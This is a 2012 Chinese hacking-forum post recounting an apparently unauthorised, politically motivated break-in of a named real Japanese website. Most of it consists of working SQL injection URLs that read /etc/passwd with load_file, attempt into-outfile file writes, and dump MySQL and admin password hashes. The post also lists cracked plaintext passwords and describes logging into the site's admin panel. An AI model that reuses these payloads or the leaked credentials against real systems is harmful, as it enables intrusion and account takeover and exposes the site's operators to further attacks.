中国网络渗透测试联盟

标题: 原创 检测汉奸站全过程 [打印本页]

---

作者: xiancda    时间: 2012-9-17 16:22
标题: 原创 检测汉奸站全过程

补：www.zuaa.jp测试

. |/ j1 k5 ~, @! ~2 N. g* l: M
0x01. 检测 www.zuaa.jp 收集数据
[attach]73[/attach]
0 ^3 G4 G: m& i- X& y
whatweb
: e9 g+ V0 V9 ?+ L( Q( N[attach]74[/attach]

; m/ F# \" @$ G! X+ l& }, @; @利用NMAP扫描
( f+ O1 D- ?% V- [8 N[attach]75[/attach]
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0x02.找注入点
* b7 ^: w% E) U  h; h, V5 c6 @( w找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390
- M5 k' V" N1 k# R) ~( R[attach]76[/attach]

0x03.order by
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
[attach]77[/attach]
order by 28报错，order by 27正常

8 `) c9 }& L+ L$ m9 b! f! z4 R0x04.   union手动查询
; G0 k0 |2 J( ]$ `- p2 N4 y* \! b1 Whttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
) g+ T5 r3 g  }1 S3 F添加到 27 时正常显示
[attach]78[/attach]
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
  c9 J! q/ M, p. U: [% h8 C7 B. u
  Z/ ]- @/ ~' B* S9 s$ v+ c0x05. info:
; C* R3 L& _& C( Y9 n0 ghttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
$ U! D* @. \7 V: E6 h[attach]79[/attach]
user:            root@localhost
database:    openpne
: F0 _+ N7 c! ^" O5 \version:      4.1.22
) f- i4 Z& m5 k/ i: g3 Xos:             portbld-freebsd5.4

7 P" s* T% b3 s! V- n0x06. root用户
5 E: w6 B  a' {: Y5 O( s利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
1 F' k6 T; h( k0 phttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
) E1 y. o3 X, g5 G/ W9 |[attach]80[/attach]
通过工具转换
[attach]81[/attach]
. P! z2 T/ l" j4 C中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0 T, D+ x* Z# Z8 S5 b# U
0x07. 利用 into outfile
3 B9 W( ?0 U2 f/ R+ T全部都失败
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php

) ^+ R+ R' A( ohttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
; ^# Z. R% P7 o; C1 J
+ G( b/ S# G% X( A页面显示“MDB2 Error:syntax error”
2 M0 X9 w& V1 }
0x08. 利用 mysql 4.1
猜常规表名，字段未果 工具 sqlmap
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

8 p8 V+ V& T3 o- _( F2 T[attach]82[/attach]
* y4 `+ v1 B7 k! C. H
0x09. 查找后台
$ O% d; d& G( e% r! Q8 ^利用 现有的各种 后台工具尝试都不行

$ d+ O& D- R3 J' _2 w8 a0x10.  MySL外联方法
5 ^% W1 l2 I' Q2 c9 f: n从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
. i( M& R) `' L. Ihttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
. A; |1 B" W# a/ _[attach]83[/attach]
这个可以在 www.cmd5.com 解密
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
  D7 n6 u* Z5 X( o3 [1 Y- Tchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
' I* U1 @+ H7 m/ _openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知
[attach]84[/attach]
( v( a4 B& P2 z
$ |/ X: z8 p$ q+ U. l0x11. 网站突破
发现网站的源程序 openpne, google 下载 openpne 源码
[attach]85[/attach]
  K. v: h' N- X9 q
0x12. 默认信息利用
http://sns.zuaa.jp/?m=admin&a=page_login
$ t& D6 L4 r6 H* [8 i/ E[attach]86[/attach]
1 u# [# ?* H/ L) U表名 (c_admin_user) ，字段名（username,password）
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
[attach]87[/attach]
解密
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
) e8 h& ~# C! `% l4 o/ W. a
! S- D! H) T1 _0 _( v中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
+ S6 |7 a3 }# p  N
8 h, ?6 J* N9 }3 h+ O, _0x13. 登录后台
[attach]88[/attach]
) N& G! `. I$ j% k/ j8 x$ [- H
- t: c' T  E& Y- s- r% Q7 U3 ]
0x14. 小结
利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
5 T0 S: k* c, b  _; y# G感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
+ J3 U5 x0 a  y' ?: a/ F7 O8 n7 j
5 R5 C! j/ J0 z; C9 q( ~0 {最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！

---

作者: 荒村狂客    时间: 2012-9-19 08:27
哪个牛人 费的这劲 入侵的

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2